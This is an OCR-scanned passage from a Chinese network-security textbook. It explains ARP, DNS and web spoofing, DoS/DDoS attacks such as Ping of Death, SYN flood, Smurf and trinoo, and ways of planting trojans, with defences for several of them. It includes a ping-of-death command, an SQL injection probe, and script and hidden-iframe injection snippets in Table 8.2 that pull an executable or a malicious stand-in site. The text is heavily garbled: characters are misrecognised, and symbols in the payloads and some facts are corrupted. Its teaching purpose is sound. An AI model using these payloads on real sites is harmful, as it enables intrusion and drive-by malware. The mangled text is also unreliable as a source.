统 的 终端 机 上 ,设置 值 . 暗 号 或 标志 这 三 种 不 同 的 方式 来 通知 Juggernaut 程序 是 否 对 所 有 
的 网 络 流量 进行 观察 。 

(2) Hunt。 用 来 听取 截取 和 支持 网 络 上 的 活动 会 话 的 程序 。 

(3) TTY Watcher。 人 允许 监视 并 且 动 持 一 台 单 一 主机 上 的 连接 。 

(4) IP Watcher。 人 允许 监视 会 话 并 且 获 得 积极 的 反 会 话 支持 方法 。 它 基于 TTY 
Watcher, 还 可 以 监视 整个 网 络 。 
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8.5.3 ARP 欺骗 


Ll ARP 
ARP(Address Resolution Protocol, 地 址 解析 协议 ) 是 一 种 将 IP 转化 成 与 IP 对 应 网 卡 
的 物理 地 址 MAC 的 协议 。ARP 数据 包 分 组 格式 如 图 8. 12 所 示 。 


硬件 地 址 长 度 协议 地 址 长 度 


以 太 网 | 以 大 网 | 帧 类 型 | 硬件 | 协议 OP | 发 送 端 以 | 发 送 端 | 目的 以 地 址 
目的 地 址 | 源 地 址 |” 类 型 | 类 型 太 网 地 址 | IP 地 址 | 太 网 地 址 
6 6 2 2 | I, 6 4 6 4 


以 太 网 首部 28 字 节 ARP 请 求 /应 答 
图 8.12 ARP 分 组 格式 


目的 卫 


在 TCP 网 络 环境 下 ,一 个 IP 包 的 走向 靠 路 由 表 定义 。 但 是 , 当 IP 包 到 达 该 网 络 后 ,只 
有 机 器 的 MAC 地址 和 该 IP 包 中 的 MAC 地 址 相同 的 机 器 才 会 应 答 这 个 IP 包 。 地 址 解析 
是 通过 软件 实现 的 ,对 不 同 的 物理 网 络 ,由 于 协议 和 编 址 方案 不 同 , 解 析 方 法 也 不 相同 。 例 
如 以 太 网 和 ATM 网 的 IP 地 址 解析 方法 是 不 相同 的 。 

请 求 报 文 可 以 由 在 网 络 中 设立 的 一 台 或 几 台 服务 器 专门 回答 地 址 解析 的 请 求 ;或 者 向 
全 网 广播 请 求 报 文 , 由 各 台 计 算 机 自己 解析 自己 的 IP 地址。 

为 了 适应 网 络 拓扑 的 动态 变化 并 使 ARP 高 速 运行 ,通常 每 台 主 机 上 都 要 设置 一 个 
ARP 高 速 缓存 ,用 于 存放 最 近 IP 地 址 到 硬件 地 址 之 间 的 映射 记录 表 , 并 且 要 对 高 速 缓存 进 
行动 态 更 新 ,通常 高 速 缓存 中 每 项 的 生存 时 间 是 20 分 钟 。 

主机 在 发 送 一 个 IP 包 之 前 ,要 到 该 转换 记录 表 中 寻找 和 IP 包 对 应 的 MAC 地 址 。 如 
果 没 有 找到 ,该 主机 就 发 送 一 个 ARP 广播 包 , 广 播 给 网 上 的 所 有 计算 机 ,每 台 计 算 机 收 到 
这 个 请 求 消息 后 都 要 检测 其 中 的 IP 地 址 ;与 IP 地 址 匹配 的 计算 机 即 发 出 一 个 应 答 消 息 ,而 
其 他 计算 机 则 丢弃 收 到 的 请 求 ,不 发 出 任何 应 答 。 可 以 看 出 ,IP 地 址 是 32 位 的 (4Byte) ,而 
以 太 网 地 址 是 48 位 的 (6Byte) 。 

2. ARP 欺骗 原理 

ARP 是 无 状态 的 协议 ,在 没有 请 求 时 也 可 以 发 送 应 答 的 包 。 人 入侵 者 可 以 利用 这 一 点 向 
网 络 上 发 送 自己 定制 的 包 , 包 中 包括 源 IP 地 址 、 目 的 IP 地 址 以 及 硬件 地 址 ,不 过 它们 都 是 
伪造 的 。 这 些 伪造 的 数据 会 修改 网 络 上 主机 中 的 ARP 高 速 缓 存 。 

例如 ,网 络 上 有 三 台 主 机 ,有 如 下 的 信息 : 


主机 名 下 地 址 硬件 地 址 
A 201. 15. 192. 01 AA:AA 
B 201. 15. 192. 02 BB: BB 
Ce 201. 15. 192. 03 CCCE 


这 三 台 主 机 中 ,B 是 入 侵 者 控制 主机 ,具有 root 权限 ,而 A 信任 C。 入 侵 者 的 目的 就 是 
伪装 成 C 获得 A 的 信任 ,以 便 获得 一 些 无 法 直接 获得 的 信息 等 。 入 侵 者 利用 ARP 欺骗 的 
工具 如 send_arp, 通 过 B 进行 ARP 欺骗 的 过 程 如 图 8. 13 所 示 。 
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B( 入 侵 者 ) 


上 201.15.192.03 是 BB:BB @201.15.192.02 


BB:BB 
@201.15.192.01 是 DD:DD 


201.15.192.01 VY 201.15.192.03 
AA:AA [SS <s CC:CC 
A G 
图 8.13 ARP 欺骗 过 程 


(1) 主机 B 向 A 发送 一 个 ARP 应 答 ,ARP 应 答 中 包括 源 IP 地 址 (201. 15.192.03), 源 
硬件 地 址 (BB:BB) .目标 IP 地 址 (201.15.192.01) 和 目标 硬件 地 址 (AA:AA)。 

这 条 应 答 被 A 接受 后 ,就 被 保存 到 A 主机 的 ARP 高 速 缓存 中 了 。 但 是 ,由 于 C 主 机 
也 有 可 能 向 A 发 出 自己 的 ARP 应 答 , 将 A 的 ARP 缓存 改 回 正确 的 硬件 地 址 ,因此 B 在 进 
行 ARP 欺骗 时 还 必须 使 C 不 能 向 A 发 送 ARP 应 答 。 办 法 是 也 向 C 发 ARP 应 答 , 将 A 的 
硬件 地 址 改 为 一 个 虚假 的 地 址 (不 存在 的 硬件 地 址 ) 如 DD:DD, 使 得 C 发 向 A 的 ARP 应 答 
根本 无 法 收 到 。 

(2) A 根据 ARP 缓存 中 的 缓存 记录 ,将 发 往 C(201. 15. 192. 03,CC:CC) 的 数据 报 文 发 
向 了 B(201.15. 192. 03,BB:BB) 。 

3. ARP 欺骗 的 防范 

(1) MAC 地 址 绑 定 。 使 网 络 中 每 一 台 计 算 机 的 IP 地 址 与 硬件 地 址 一 一 对 应 ,不 可 
更 改 。 

(2) 使 用 静态 ARP 缓存 。 用 手工 方法 更 新 缓存 中 的 记录 ,使 ARP 欺骗 无 法 进行 。 

(3) 使 用 ARP 服务 器 。 使 其 他 计算 机 的 ARP 配置 只 接收 来 自 ARP 服务 器 的 ARP 
响应 。 


8.5.4 DNS 欺骗 


1. DNS 及 其 工作 过 程 

DNS(Domain Name System, 域 名 系统 ) 是 一 种 用 于 TCP/IP 应 用 程序 的 分 布 式 数据 
库 , 它 提供 主机 名 字 和 IP 地 址 之 间 的 转换 以 及 有 关 电 子 邮 件 的 选 路 信息 。DNS 有 两 个 重 
要 特性 : 

(1) DNS 对 于 自己 无 法 解析 的 域名 ,会 自动 向 其 他 DNS 服务 器 查询 。 

(2) 为 提高 效率 ,DNS 会 将 所 有 已 经 查询 到 的 结果 存 人 缓存 (Cache) 。 

正 是 这 两 个 特点 使 得 DNS 欺骗 成 为 可 能 。 设 有 如 图 8. 14 所 示 的 A、B、C 三 台 主 机 。 
其 中 ,B 向 A 提供 DNS 服务 ,A 想 要 访问 C(www. ccc. com)。DNS 的 正常 工作 过 程 如 下 : 
(1) A 向 B 发 一 个 DNS 查询 请 求 ,要 求 B 告诉 www. ccc. com 的 IP 地 址 ,以 便 与 之 
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B(DNS 服 务 器 ) 其 他 DNS 服 务 器 
回 向 其 他 DNS 请 求 全 
v 回 结果 (201.15.192.03) 她 
201.15.192.02 
名 请 求 www.ccc.com 的 了 
@ 结 果 
A 已 
全 加 向 C 发 出 连接 请 求 
201.15.192.01 WWWw.ccc.com 
(201.15.192.03) 


图 8.14 DNS 工作 过 程 


通信 。 

(2) B 查询 自己 的 DNS 数据 库 , 找 不 到 www. ccc. com 的 IP 地 址 ,于 是 向 其 他 DNS 服 
务 器 求援 , 逐 级 递交 DNS 请 求 。 

(3) 某 个 DNS 服务 器 查 到 了 www. ccc. com 的 IP 地 址 ,向 B 返 回 结果 ,B 将 这 个 结果 
保存 在 自己 的 缓存 中 。 

(4) B 将 结果 告诉 A。 

(5) A 得 到 了 C 的 IP 地 址 ,就 可 以 向 C 发 出 连接 请 求 ,访问 C。 

在 上 述 过 程 中 ,如 果 B 在 一 定 的 时 间 内 不 能 给 A 返回 要 查找 的 IP 地 址 ,就 会 给 A 返 
主机 名 不 存在 的 错误 信息 。 

2. DNS 欺骗 原理 

实施 DNS 欺骗 (DNS Spoofing) 的 基本 思路 就 是 让 DNS 服务 器 的 缓存 中 存 有 错误 的 
IP 地 址 , 即 在 DNS 缓存 中 放 一 个 伪造 的 缓存 记录 。 为 此 ,攻击 者 需要 做 两 件 事 : 

(1) 伪造 一 个 用 户 的 DNS 请 求 ,发 往 DNS 服务 器 。 

(2) 伪造 一 个 查询 应 答 ,更 新 DNS 服务 器 的 DNS 缓存 。 

但 是 ,在 DNS 的 消息 格式 中 还 有 一 个 16 位 的 查询 标识 符 (Query ID), 它 将 被 复制 到 
DNS 服务 器 的 相应 应 答 中 ,在 多 个 查询 未 完成 时 用 于 区 分 响应 。 所 以 ,回答 信息 只 有 
Query ID 和 IP 都 吻合 才能 被 DNS 服务 器 接受 。 因 此 ,进行 DNS 欺骗 攻击 还 需要 能 够 精 
确 地 猜测 出 Query ID。 由 于 Query ID 每 次 加 1, 只 要 通过 第 一 次 向 将 要 欺骗 的 DNS 服务 
器 发 一 个 查询 包 并 监听 其 Query ID 值 , 随 后 再 发 送 设计 好 的 应 答 包 , 包 内 的 Query ID 就 是 
要 预测 的 Query ID。 

一 次 DNS 欺骗 过 程 如 下 : 

(1) 入 侵 者 先 向 BIDNS 服务 器 ) 提 交 查 询 www. ccc. com 的 IP 地 址 请 求 。 

(2) B 向 外 递交 查询 请 求 。 

(3) 人 侵 者 立即 伪造 一 个 应 答 包 ,告诉 www. ccc. com 的 IP 地 址 是 201. 15. 192. 04( 往 
往 是 入 侵 者 的 IP 地 址 ) 。 

(4) 查询 应 答 被 BCDNS 服务 器 ) 记 录 到 缓存 中 。 

(5) 当 A 向 BB 提交 查询 www. ccc. com 的 IP 地址 请 求 时 ,B 将 201.15.192.04 告诉 A。 
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可 以 看 出 ,DNS 欺骗 是 有 一 定局 限 性 的 , 即 和 人 侵 者 不 能 蔡 换 DNS 缓存 中 已 经 存在 的 记 
录 ; 缓 在 中 的 记录 具有 一 定 的 生存 期 ,过 期 就 会 被 刷新 。 


8.5.5 Web 欺骗 


1. 网 站 欺骗 

攻击 者 抢先 或 特别 设计 注册 一 个 有 欺骗 性 的 高 仿 域 名 ,并 设计 相应 站 点 。 当 有 用 户 浏 
览 了 这 个 假冒 地 址 并 与 之 进行 了 一 些 信息 交流 (如 填写 了 一 些 表 单 ) 后 ,站 点 会 给 出 一 些 响 
应 的 提示 和 回答 ,同时 记录 下 用 户 的 信息 ,并 给 这 个 用 户 一 个 cookie, 以 便 能 随时 跟踪 这 个 
用 户 。 如 假冒 金融 机 构 偷 盗 客户 的 信用 卡 信息 。 

2. 中 间 人 攻击 

要 求 攻击 者 必须 位 于 受害 方 所 有 进出 的 流量 都 经 过 的 位 置 。 例 如 通过 某 种 方法 (比如 
DNS 欺骗 ) 把 目标 主机 的 域名 所 对 应 的 IP 地 址 与 自己 所 控制 的 机 器 相 联 系 , 使 外 界 对 目标 
主机 的 所 有 请 求 都 涌 向 控制 主机 ,攻击 者 可 以 转发 所 有 的 请 求 到 目标 机 器 ,再 把 目标 机 器 处 
理 结果 发 回 到 发 出 请 求 的 客户 端 。 实 际 上 攻击 者 的 机 器 成 为 目标 机 器 的 代理 服务 器 ,可 以 
监视 所 有 外 界 进 入 目标 机 器 的 数据 流 , 可 以 任意 窃听 甚至 修改 数据 流 里 的 数据 和 信息 。 

3. Web 欺骗 的 技巧 

(1) 表单 欺骗 。 改 写 表单 的 URL 地 址 , 当 受 攻击 者 提交 表单 后 ,所 提交 的 数据 进入 了 
攻击 者 的 服务 器 。 

(2) 诱饵 攻击 。 以 某 种 方式 引诱 受 攻 击 者 进入 攻击 者 所 创造 的 错误 的 Web。 

(3) 伪装 欺骗 。 伪 装 制造 一 个 可 信 的 环境 ,包括 各 类 图 标 ,文字 和 链接 等 ,提供 给 受 攻 
击 者 各 种 各 样 的 可 信 的 上 暗示 ,以 隐藏 一 切 尾巴 。 

(4) 隐藏 真实 的 URL。 浏 览 器 Web 链接 时 底部 显示 链接 所 指 的 URL 地 址 ,通过 
JavaScript 编程 改写 URL 状态 恢复 为 改写 前 的 状态 来 隐藏 URL。 

4. Web 欺骗 的 弱点 

(1) HTML 源 代码 查看 。 用 户 通过 使 用 浏览 器 中 的 viewsource 命令 ,能够 阅读 当前 的 
HTML 源 文件 代码 ,因此 可 以 发 现 被 改写 的 URL, 从 而 发 现 攻 击 。 另 外 ,用 户 通过 使 用 浏 
览 器 中 的 view document information 命令 ,能 够 阅读 当前 URL 的 真实 URL 地 址 ,由 此 很 
容易 判断 出 Web 欺骗 。 

(2) 逃离 灾难 。 用 户 可 以 使 用 Back 键 ,逃离 原先 的 错误 Web 页 面 。 这 种 操作 给 了 用 
户 逃 离 灾难 的 主动 权 。 如 果 用 户 将 所 访问 的 错误 Web 页 保存 在 收藏 栏 , 下 次 可 能 会 直接 进 
入 攻击 者 所 设 下 的 陷阱 。 

(3) Web 服务 器 的 暴露 。 如 果 Web 欺骗 是 Web 服务 器 被 攻击 后 的 产物 ,攻击 者 就 像 
盗贼 驾驶 着 偷 来 的 汽车 去 作案 一 样 ,随时 都 会 被 管理 者 发 现 。 

5. Web 欺骗 的 预防 

短期 的 解决 方案 如 下 : 

(1) 禁止 浏览 器 中 的 JavaScript 功能 ,使 各 类 改写 信息 不 能 被 掩盖 。 

(2) 确保 浏览 器 的 连接 状态 是 可 见 的 。 

(3) 时 刻 注 意 所 单 击 的 URL 链接 会 在 位 置 状态 行 中 得 到 正确 的 显示 。 

要 彻底 解决 ,就 必须 改变 浏览 器 ,使 之 具有 反映 真实 URL 信息 的 功能 ,而 不 会 被 蒙蔽 。 
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对 于 通过 安全 连接 建立 的 Web 服务 和 浏览 器 对 话 ,浏览 器 还 应 该 告诉 用 户 谁 在 另 一 端 ,而 
不 只 是 表明 一 种 安全 连接 的 状态 。 


8.6 拒绝 服务 类 攻击 


拒绝 服务 (Denial of Service,DoS) 攻 击 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 资 
源 ,使 得 目标 系统 因 遭 受 某 种 程度 的 破坏 而 不 能 继续 提供 正常 的 服务 ,甚至 导致 物理 上 的 次 
痪 或 骨 溃 。 

按照 所 使 用 的 技术 ,拒绝 服务 大 体 上 可 以 分 为 两 大 类 : 

一 类 是 基于 错误 配置 系统 漏洞 或 软件 缺陷 ,如 利用 传输 协议 缺陷 ,发 送 畸 形 数 据 包 , 以 
耗 尽 目标 主机 资源 ,使 之 无 法 提供 服务 ;利用 主机 服务 程序 漏洞 ,发 送 特殊 格式 数据 ,导致 服 
务 处 理 出 错 而 无 法 提供 服务 。 

另 一 类 是 通过 攻击 合理 的 服务 请 求 ,消耗 系统 资源 ,使 服务 超载 ,无 法 响应 其 他 请 求 。 
例如 制造 高 流量 数据 流 ,造成 网 络 拥塞 ,使 受害 主机 无 法 与 外 界 通信 。 

在 许多 情况 下 要 使 用 上 面 两 种 方法 的 组 合 。 例 如 ,利用 受害 主机 服务 缺陷 ,提交 大 量 请 
求 以 耗 尽 主机 资源 ,使 受害 主机 无 法 接受 新 请 求 。 


8.6.1 几 种 典型 的 拒绝 服务 攻击 


1. 死亡 之 Ping(Ping of Death) 

网 际 控制 消息 协议 (ICMP) 是 IP 层 的 一 种 差错 报告 机 制 , 能 把 IP 数据 包 在 传送 过 程 中 
遇 到 的 差错 报告 给 源 主机 。ICMP 报 文 始终 包含 IP 首部 和 产生 ICMP 差错 报 文 的 IP 数据 
报 的 前 8 个 字 节 (64KB) 。 早 期 操作 系统 在 处 理 ICMP 协议 时 只 开辟 64KB 的 缓存 区 ,一 旦 
处 理 的 数据 报 的 实际 长 度 超过 64KB, 操 作 系 统 将 会 产生 一 个 缓冲 区 溢出 ,引起 内 存 分 配 错 
误 , 最 终 导致 TCP/IP 协议 堆栈 的 崩溃 ,造成 主机 死机 。 

死亡 之 Ping 就 是 利用 早期 的 Ping 程序 可 以 用 参数 -| 发 送 一 个 超过 64KB 的 报 文 。 如 
ping -1 65540 212. 15. 1.0, 如 果 对 方 的 主机 存在 这 种 漏洞 ,就 会 形成 一 次 拒绝 服务 攻击 。 但 
现在 的 操作 系统 所 附带 的 Ping 程序 都 限制 了 发 送 数据 包 的 大 小 ,因而 这 样 的 攻击 已 经 不 再 
可 能 。 

2.“ 泪 滴 (Teardrop)” 

“ 泪 滴 ? 也 称 为 分 片 攻击 ,是 一 个 利用 TCP/IP 缺陷 进行 的 拒绝 服务 攻击 。 当 两 台 计 算 
机 通信 时 , 若 数据 量 太 大 ,无 法 在 一 个 数据 报 文中 进行 传输 ,就 会 由 TCP 将 数据 拆 分 成 多 个 
分 片 ,传送 到 目的 地 后 再 到 堆栈 中 进行 重组 。 为 了 方便 组 装 ,各 分 片 在 IP 包 的 首部 中 必须 
含有 本 片 数据 的 分 片 信息 一 一 分 片 起 始 地 址 与 偏 移 。 如 图 8. 15 所 示 是 将 一 个 数据 分 成 三 
片 ,并 要 尽快 地 将 数据 送 往 接收 进程 (PSH) 。 


PSH 1:1024 (1024) ackl，win4096 
PSH 1025:2048 (1024) ackl, win4096 
PSH 2049:3072(1024) ackl, win4096 


“ 泪 滴 ” 攻 击 就 是 入 侵 者 伪造 数据 报 文 ,向 目标 机 发 送 含 有 重 琶 偏 移 的 畸形 数据 分 片 。 
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PSH 1:1024… PSH 1025:2048… ”| PSH 2049:3072… “| 发 送 端 

1 1 1 
PSH 2049:3072… 
PSH 1025:2048… 网 络 

1 | EE 

PSH 1:1024… 
| 1 1 

PSH 1:1024… PSH 1025:2048… ”| PSH 2049:3072.… | 接收 端 


图 8.15 TCP 数据 的 分 片 , 传 输 和 重 装 


如 图 8. 16 所 示 。 当 这 样 的 畸形 分 片 传送 到 目的 主机 后 ,在 堆栈 中 重组 时 就 会 导致 重组 出 
错 , 引 起 协议 栈 的 崩溃 。 


入 侵 者 
| PSH 1000:2048 (1024)… | 
PSH 1:1024… 
| 1 | | 
1 1 1 i 
重 装 出 错 目标 主机 


图 8.16 含有 重合 偏 移 的 畸形 数据 分 片 


3. UDP* 洪 水 ”(UDP Flood) 

UDP* 洪 水 ”由 ECHO/CHARGEN 服务 引起 。ECHO/CHARGEN 服务 是 TCP/IP 为 
TCP 和 UDP 提供 的 一 种 服务 。ECHO 的 作用 就 是 由 接收 端 将 接收 到 的 数据 内 容 返 回 到 发 
送 端 ,CHARGEN 则 随机 返回 字符 。 这 样 为 网 络 管理 员 提 供 了 进行 可 达 性 测试 协议 软件 
测试 和 选 路 识别 的 重要 手段 ,也 为 黑客 进行 “洪水 ”攻击 提供 了 途径 。 当 入 侵 者 假冒 一 台 主 
机 向 另 一 台 主机 的 服务 端口 发 送 数据 时 ,ECHO 服务 或 CHARGEN 服务 就 会 自动 回复 。 
两 台 机 器 之 间 的 互相 回 送 会 形成 大 量 数据 包 时 。 当 多 台 主 机 之 间 相 互 产 生 回 送 数据 包 时 ， 
最 终 会 导致 系统 瘫痪 。 

4. SYN* 洪 水 ”(SYN Flood) 与 Land 

这 是 两 个 利用 TCP 连接 中 三 次 握手 过 程 的 缺陷 的 拒绝 服务 攻击 。 正 常 的 TCP 握手 需 
要 三 次 包 交 换 来 建立 。 一 台 服务 器 一 旦 接收 到 客户 端的 SYN 包 后 必须 回应 一 个 SYN/ 
ACK 包 , 然 后 等 待 该 客户 端 回应 给 它 一 个 ACK 包 来 确认 才 真 正 建立 连接 。 

SYN* 洪 水 ”的 攻击 方法 是 攻击 者 用 伪造 的 地 址 (网 上 没有 使 用 的 地 址 ) 向 目标 主机 发 
出 大 量 初始 化 的 SYN 包 请 求 连接 。 目 标 主机 收 到 请 求 后 ,分 别 回 以 相应 的 SYN/ACK, 但 
是 由 于 源 地 址 是 虚假 的 ,SYN/ACK 包 不 会 到 达 攻 击 者 的 主机 ,所 以 目标 主机 的 SYN/ACK 
不 会 得 到 确认 ,会 保持 相应 的 连接 直到 超时 。 当 这 些 未 释放 的 连接 请 求 超过 一 定 限度 时 ,就 
会 拒绝 新 的 连接 请 求 。 

Land 也 是 利用 三 次 握手 的 缺陷 进行 攻击 。 但 它 不 是 依靠 伪造 的 地 址 ,而 是 先 发 出 一 个 
特殊 的 SYN 数据 包 , 包 中 的 源 地 址 和 目标 地 址 都 是 目标 主机 。 这 样 就 会 让 目标 主机 向 自 
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己 回 以 SYN/ACK 包 , 导 致 自己 又 给 自己 回 一 个 ACK 并 建立 自己 与 自己 的 连接 。 大 量 这 
样 的 无 效 连接 达到 一 定数 量 , 将 会 拒绝 新 的 连接 请 求 。 


8.6.2 分 布 式 拒绝 服务 


分 布 式 拒绝 服务 (Distributed Denial of Service,DDoS) 攻 击 指 借助 于 客户 端 /服务 器 技 
术 , 将 多 个 计算 机 联合 起 来 作为 攻击 平台 ,对 一 个 或 多 个 目标 发 动 DDoS 攻击 ,从 而 成 倍 地 
提高 拒绝 服务 攻击 的 威力 。 

1. DDoS 攻击 原理 

通常 ,攻击 者 使 用 一 个 偷窃 账号 将 DDoS 主 控 程序 安装 在 一 个 计算 机 上 ,在 一 个 设 定 的 
时 间 主 控 程序 将 与 大 量 代理 程序 通信 ,代理 程序 已 经 被 安装 在 Internet 上 的 许多 计算 机 上 。 
代理 程序 收 到 指令 时 就 发 动 攻 击 。 利 用 客户 端 /服务 器 技术 , 主 控 程 序 能 在 几 秒 钟 内 激活 成 
百 上 千 次 代理 程序 的 运行 ,如 图 8. 17 所 示 。 


代理 端 
图 8.17 DDoS 攻击 原理 


如 图 8. 18 所 示 ,一 个 比较 完善 的 DDoS 攻击 体系 分 为 4 部 分 : 攻击 者 所 在 主机 、 控 制 
机 (用 来 控制 俐 偶 机 )、 佛 和信 机 ( 即 攻击 代理 机 ) 和 受害 者 (攻击 目标 )。 对 受害 者 的 攻击 是 从 
倪 偶 机 上 发 出 的 ,控制 机 只 发 布 命令 而 不 参与 实际 的 攻击 。 

攻击 步骤 如 下 : 

(1) 搜集 了 解 目标 的 情况 。 攻 击 前 必须 了 解 目标 的 情况 ,如 被 攻击 目标 的 主机 数目 .地 
址 情况 ,目标 主机 的 配置 性 能 ,目标 网 络 的 带宽 等 。 一 般 互联 网 上 的 某 个 大 型 网 站 都 可 能 
有 很 多 台 主 机 利用 负载 均衡 技术 提供 同一 个 网 站 的 Web 服务 。 

对 于 DDoS 攻击 者 来 说 ,有 一 个 重点 就 是 确定 到 底 有 多 少 台 主机 在 支持 这 个 站 点 ,要 让 
这 个 网 站 中 所 有 IP 地 址 的 机 器 都 瘫 掉 , 必 须 使 用 多 少 台 佛 偶 机 才能 达到 拒绝 服务 的 效果 。 

(2) 占领 伯 偏 机。 黑客 最 感 兴趣 的 主机 是 链 路 状态 好 、 性 能 好 、 安 全 管理 水 平 差 的 主 
机 。 黑 客 占领 倪 儒 机 ,一 般 是 利用 扫描 去 发 现 网 络 上 那些 有 漏洞 的 机 器 ,然后 尝试 入 侵 并 占 
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控制 俐 偶 机 
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图 8.18 DDoS 攻击 的 一 般 原理 


领 , 留 下 后 门 . 擦 除 痕迹 ,并 把 DDoS 攻击 用 的 代理 程序 利用 ftp 上 传 到 倪 偶 机 ,并 且 秘 密 地 
安置 。 黑 客 就 是 利用 它 来 向 受害 目标 发 送 恶意 攻击 包 的 。 

(3) 实际 攻击 。 实 际 攻击 过 程 反 而 是 比较 简单 的 。 攻 击 者 只 需 向 俐 偶 机 上 的 代理 程序 
发 送 攻击 指令 ,攻击 机 中 的 DDoS 攻击 程序 就 会 响应 控制 台 的 命令 ,一 起 向 受害 主机 以 高 速 
度 发 送 大 量 的 数据 包 ,导致 它 死机 或 是 无 法 响应 正常 的 请 求 ,一般 会 以 远 远 超出 受害 方 处 理 
能 力 的 速度 进行 攻击 。 黑 客 还 会 将 部 分 作 介 机 提升 为 中 间 的 控制 机 来 控制 一 组 倪 偶 机 ,以 
便 分 组 攻击 ,提高 攻击 灵活 度 和 反 追 踪 强 度 。 高 明 的 攻击 者 还 要 一 边 攻击 一 边 用 各 种 手段 
来 监视 攻击 的 效果 ,如 开启 一 个 小 窗口 不 断 地 ping 目标 主机 ,在 能 接 到 回应 的 时 候 就 再 加 
大 一 些 攻击 流量 或 是 再 命令 更 多 的 倪 介 机 来 加 入 攻击 。 

2. 几 种 DDoS 攻击 

(1) Smurf 与 Fraggle。 将 目的 地 址 设置 成 广播 地 址 后 ,将 会 被 网 络 中 所 有 主机 接收 并 
处 理 。 如 果 攻 击 者 假冒 目标 主机 的 地 址 发 出 广播 信息 , 则 所 有 主机 都 会 向 目标 主机 回复 一 
个 应 答 使 目标 主机 淹没 在 大 量 信息 中 ,无 法 提供 新 的 服务 。 这 两 个 攻击 就 是 利用 广播 地 址 
的 这 一 特点 将 攻击 放大 而 实施 的 拒绝 服务 攻击 。 其 中 ,Smurf 是 用 广播 地 址 发 送 ICMP 
ECHO 包 ,而 Fraggle 是 用 广播 地 址 发 送 UDP 包 。 

显然 ,Smurf 攻击 的 条 件 是 系统 路 由 器 上 启动 了 IP 广播 功能 ,允许 Smurf 发 送 一 个 伪 
造 的 ping 信息 包 。 

为 防止 系统 成 为 Smurf 攻击 的 平台 ,应 禁止 所 有 路 由 器 上 IP 的 广播 功能 。 但 是 该 方法 
不 能 防止 攻击 者 从 LAN 内 部 发 动 一 个 Smurf 攻击 。 为 了 避免 这 种 攻击 ,许多 操作 系统 都 
提供 了 相应 设置 ,防止 计算 机 对 IP 广播 请 求 做 出 响应 。 

挫败 一 个 Smurf 攻击 的 最 简单 方法 是 对 边界 路 由 器 的 应 答 (Echo Reply) 信 息 包 进行 过 
滤 , 然 后 丢弃 它们 ,使 网 络 避 免 被 淹没 。 

(2) trinoo。trinoo 是 复杂 的 DDoS 攻击 程序 , 它 使 用 主 控 程 序 master 对 实际 实施 攻击 
的 任何 数量 的 “代理 ”程序 实现 自动 控制 。 图 8. 18 形象 地 表明 了 它 的 攻击 原理 。 图 中 的 “ 攻 


342 


第 8 章 攻 浊 


击 倪 癸 机 ?就 是 一 些 “ 代 理 ?，“ 控 制 侧 偶 机 ?就 是 安装 有 master 程序 的 计算 机 。 

trinoo DDoS 攻击 的 基本 过 程 是 : 攻击 者 连接 到 安装 了 master 程序 的 计算 机 ,启动 
master 程序 ,然后 根据 一 个 IP 地 址 的 列表 ,由 master 程序 负责 启动 所 有 的 代理 程序 。 接 
着 ,代理 程序 用 UDP 信息 包 冲 击 网 络 ,攻击 目标 。 在 攻击 之 前 ,侵入 者 为 了 安装 软件 ,已 经 
控制 了 装 有 master 程序 的 计算 机 和 所 有 装 有 代理 程序 的 计算 机 。 

(3) TFN(Tribal Flood Network)。TEFN 与 trinoo 一 样 ,使 用 一 个 master 程序 与 位 于 
多 个 网 络 上 的 攻击 代理 进行 通信 。TFN 可 以 并 行 发 动 数不胜数 的 DDoS 攻击 ,类 型 多 种 多 
样 (如 UDP 攻击、TCP SYN 攻击 、ICMP 回音 请 求 攻击 以 及 ICMP 广播 ), 而 且 还 可 建立 带 
有 伪装 源 IP 地 址 的 信息 包 。TFN2K 是 TFN 的 一 个 更 高 级 的 版 本 , 它 “ 修 复 ” 了 TFN 的 某 
些 缺点 。 

(4) stacheldraht。stacheldraht 也 是 基于 TFN 的 , 它 采用 和 trinoo 一 样 的 客户 端 / 服 
务 器 模式 ,增加 了 以 下 新 功能 : 攻击 者 与 master 程序 之 间 的 通信 和 是 加 密 的 ,使 用 RCP ( 远 
程 复制 ) 技 术 对 代理 程序 进行 更 新 。 

3. DDoS 攻击 的 防御 策略 

DDoS 攻击 的 隐蔽 性 极 强 , 迄 今 为 止 人 们 还 没有 找到 对 DDoS 攻击 行 之 有 效 的 解决 方 
法 。 所 以 加 强 安全 防范 意识 提高 网 络 系统 的 安全 性 还 是 当前 最 为 有 效 的 办 法 。 可 采取 的 
安全 防御 措施 有 以 下 几 种 : 

(1) 及 早 发 现 系 统 存在 的 攻击 漏洞 ,及 时 安装 系统 补丁 程序 。 对 一 些 重 要 的 信息 (例如 
系统 配置 信息 ) 建 立 和 完善 备份 机 制 。 对 一 些 特权 账号 (例如 管理 员 账号 ) 的 密码 设置 要 说 
慎 。 通 过 这 样 一 系列 的 举措 可 以 把 攻击 者 的 可 乘 之 机 降低 到 最 小 。 

(2) 在 网 络 管理 方面 ,要 经 常 检查 系统 的 物理 环境 ,禁止 那些 不 必要 的 网 络 服务 。 建 立 
边界 安全 界限 ,确保 输出 的 包 受 到 正确 限制 。 经 常 检测 系统 配置 信息 ,并 注意 查看 每 天 的 安 
全 日 志 。 


8.7 植 人 木马 


木马 是 一 种 基于 远程 控制 的 黑客 工具 ,主要 目的 是 偷 取 文件 ,机密 数 据 和 个 人 隐私 等 信 
息 。 分 为 远程 访问 型 .密码 发 送 型 ,键盘 记录 型 .毁坏 型 .FTP 型 和 网 页 脚本 型 等 类 型 的 木 
马 。 木 马 植 入 攻击 方式 如 表 8. 2 所 示 。 


表 8.2 木马 常用 植 入 攻击 方式 


常见 攻击 方式 攻击 方式 
注入 注入 点 asp?id 二 x, 在 网 站 的 后 面 加 上 and 1=1 和 andl=2 进行 逻辑 爆破 数据 库 
跨 站 在 输入 框 输入 二 SCRIPT language 王 JavaScript scr 一 "http://xxx. exe"type 一 text/ 


javascript defer 二 就 会 下 载 xxx. exe 等 


旁 注 通过 公用 一 台 服务 器 的 特点 ,取得 服务 器 权限 ,控制 服务 器 上 的 其 他 网 站 


在 网 页 中 插入 二 ifname scr 二 http://www. xxx. com 或 者 //xx. exe width 一 "0" 
height 王 "0" 盖 一 /ifname> ,其 中 http://www. xxx. com 就 是 恶意 的 网 站 


html 语言 挂 马 
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续 表 


常见 攻击 方式 攻击 方式 
在 .js 文件 中 写 入 代码 document. write(" 二 iframewidth 二 "0”height 王 "0"src 一 
js 挂 马 http://www. xxx. com 二 一 /iframe 二 一 script 二") ,其 中 http://www. xxx. com 是 恶 
意 网 站 
